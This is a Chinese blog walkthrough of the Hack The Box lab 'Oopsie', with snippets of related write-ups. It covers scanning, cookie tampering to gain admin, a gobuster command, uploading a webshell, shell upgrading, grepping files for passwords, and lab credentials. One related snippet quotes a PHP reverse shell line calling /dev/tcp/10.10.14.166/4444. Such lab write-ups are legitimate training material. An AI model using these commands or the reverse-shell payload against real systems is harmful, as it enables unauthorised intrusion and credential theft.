[渗透测试]HTB-Oopsie

最新推荐文章于 2023-04-18 15:22:00 发布
最新推荐文章于 2023-04-18 15:22:00 发布
阅读量1.2k 收藏 1
点赞数
分类专栏: 网络安全 文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_47224111/article/details/121339192
版权
本文详细记录了对HTB靶机Oopsie的渗透测试过程,包括信息收集、80端口测试、权限提升和总结。通过nmap扫描、弱口令尝试、目录扫描、webshell利用,最终通过修改PATH环境变量利用bugtracker获取root权限,找到并读取了flag。
摘要由CSDN通过智能技术生成

0x01 信息收集

在这里插入图片描述
nmap扫描 发现80端口 和22端口
在这里插入图片描述

0x02对80端口进行测试

访问是一个页面,啥也没有。
在这里插入图片描述打开burp抓包查看sitemap
发现/cdn-cgi/login/存在登录页面
在这里插入图片描述
尝试弱口令,但是没有成功,有个访客登录,登录后存在一个上传的地方,但是需要super admin权限。
在这里插入图片描述
查看account url栏里id修改为1 发现了admin的access id 值
在这里插入图片描述替换cookie
在这里插入图片描述

gobuster dir --url http://10.129.57.229/ --wordlist /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -x php
在这里插入图片描述目录扫描发现了存在/uploads
在这里插入图片描述访问webshell.php 获得反弹shell

0x03 权限提升

python3 -c ‘import pty; pty.spawn("/bin/bash")’ 升级shell

在这里插入图片描述
切换到 /var/www/cnd-cgi/login
cat * | grep -i passw*
查找有关于passw的文件 -i启用替换 grep 搜索
在这里插入图片描述
发现网页账号密码是 admin MEGACORP_4admin!!
查看db.php
在这里插入图片描述
在这里插入图片描述
成功登录
在这里插入图片描述
在家里发现flag

最低0.47元/天 解锁文章
hedianshui888
关注
专栏目录
HTB靶机之Oopsie
m0_46412682的博客
09-01 1559
HTB靶机之Oopsie 1、VPN connection 2、信息收集 ①masscan端口扫描 sudo masscan -p1-65535,U:1-65535 --rate 1000 -e tun0 10.10.10.28 ②nmap扫描端口对应的服务 nmap -sC -sV 10.10.10.28 开放了22端口和80端口 操作系统是:linux 3、访问80端口 没有什么可以点或者打开的地方,拉到最下面,有一条提示信息Please login to get access to the s
[渗透测试]HTB靶机-Oopsie
Y4tacker的博客
07-22 627
文章目录Oopsie Oopsie 首先跳过nmap扫描的过程,现在我们直接开始日,发现了 http://10.10.10.28/cdn-cgi/login/admin.php 用admin和MEGACORP_4dm1n!! 这里存在一个水平越权的漏洞,具体不给出分析了,看cookie都懂 垂直越权后发现存在文件上传点 这里来反弹一个shell <?php exec("/bin/bash -c 'bash -i &> /dev/tcp/10.10.14.166/4444 0&lt
# HTB-Tier2- Oopsie
32bin的博客
11-16 853
TagsPHPWebApacheOPENCONNECTONLINETask 1****yproxyTask 2//****nTask 3*****ecookieTask 4****234322Task 5/******s/uploadsTask 6**.**pdb.phpTask 7***dfindTask 8***trootTask 9Task 10cat尝试user=2233;
HTB_Start Point_Tier2——Oopsie
m0_46607055的博客
08-22 1518
HTB_Start Point_Tier2——Oopsie 反弹shell+suid提权
HTB Hack The Box -- Oopsie
Gh0st_1n_The_Shell的博客
09-10 191
开放了22ssh,80端口,其中ssh有弱口令爆破端口 先打开网页,然后进行目录爆破,在这期间先看一下网页的大概信息 没爆到什么有用的东西,但是有uploads文件夹说明是不是说明有文件上传?
HTB_Oopsie之SUID提权
网络安全学习
08-29 1064
有些地方把握不准 基础不牢
qos-htb-开源
05-03
qos-htb是您一直在等待的简单带宽管理解决方案,graphix制作了图表,您可以在一秒钟之内查看到底谁在消耗带宽!
htb-beep
m0_55772907的博客
09-15 952
一般
xml-HTB-开源
05-02
xml-HTB是用于自动生成bash脚本的工具,该工具可在Linux上设置HTB。 它使用xml配置文件。 它易于使用,具有许多功能:多种深度的类,可配置的叶子,u32和fw过滤器,可同时配置两个输入
HTB-Recon:Hackthebox计算机的自动侦查脚本(hackthebox.eu)
03-09
例如: ./htb-recon.sh 10.10.10.10. ServMon Windows ./htb-recon.sh 10.10.10.10. ServMon Windows 然后通过tmux a -t htb_recon附加会话 它能做什么 在您的主目录中创建一个工作区。 创建不同的文件夹以使事情...
oscp——HTB——Beep
王嘟嘟的博客
05-09 497
0x00 前言 难度 入门1级 0x01 信息收集 0x02 Web——Rootshell 先看一下80端口,是一个登录界面,尝试了弱口令以及SQL注入 搜索一下Elastix的历史漏洞 首先看到了一个LFI的洞,下载下来,然后看一下 利用payload进行测试 这里找到了一个admin的密码 jEhdIekWmdjE 可以尝试登录一下ssh,原本先尝试的admin,但是失败了,又尝试了下root,就可以成功的连接上了。 ...
渗透测试实验一报告
JNpvA的博客
11-02 1727
1、用搜索引擎Google或百度搜索麻省理工学院网站中文件名包含“network security”的pdf文档,截图搜索得到的页面。 2、照片中的女生在哪里旅行? 截图搜索到的地址信息。 3、手机位置定位。通过LAC(Location Area Code,位置区域码)和CID(Cell Identity,基站编号,是个16位的数据(范围是0到65535)可以查询手机接入的基站的位置,从而初步确定手机用户的位置。 获取自己手机的LAC和CID: Android 获取方法:Android: 拨号##46
服务器漏洞渗透测试
m0_46363470的博客
03-27 6695
渗透测试 本教程仅用于学习,出现问题与本人无关 主机发现:使用工具进行IP扫描 namp -sP 环境的IP段(192.168.0.1/24) arp-scan -l 端口扫描 nmap -p 1-65535 -A 目标主机IP [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-0dNBWl30-1648358293931)(P3.png)] 发现有22、80两个端口存在服务 先从80端口进行渗透发现是否存在漏洞 [外链图片转存失败,源站可能有防盗链机制,建议将图片保
渗透测试实战 - 外网渗透内网穿透(超详细)
HAKUNAMATATATTA的博客
02-18 8149
渗透测试实验,外网渗透和内网穿透的详细操作过程以及内网代理和内网探测的方法
10.100个渗透测试实战#10(DC-5)
qwsn
03-30 2723
世间一切即可努力 ...
7.100个渗透测试实战#7(Biilu_b0x)
qwsn
03-27 2712
世间一切皆可努力 ...
渗透测试中常用端口利用总结
最新发布
xv7676的博客
04-18 634
当然这也是系统合法的服务,通常是不会被杀毒软件所查杀的。1521是大型数据库Oracle的默认监听端口,估计新手还对此端口比较陌生,平时大家接触的比较多的是Access,MSSQL以及MYSQL这三种数据库。目前黑客对80端口的攻击典型是采用SQL注入的攻击方法,脚本渗透技术也是一项综合性极高的web渗透技术,同时脚本渗透技术对80端口也构成严重的威胁。telnet是一种旧的远程管理方式,使用telnet工具登录系统过程中,网络上传输的用户和密码都是以明文方式传送的,黑客可使用嗅探技术截获到此类密码。
kali渗透80端口的php,kali linux 网络渗透测试学习笔记(一)Nmap工具进行端口扫描...
weixin_28790465的博客
04-02 4833
一.利用Nmap扫描网站服务器的端口开放情况首先打开我们的kali linux才做系统,再打开其命令行模式,输入:nmap www.csdn.net 如下图所示: 因此,通过这个结果可以表明csdn上的端口开放了80端口以及443端口吗,这两个端口都十分重要,因为80端口适用于给用户呈现出数据,给用户看网站用的,443端口也是一个比较重要的端口。而且此网站并没有其他端口的开放,说明安全性还是很好的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值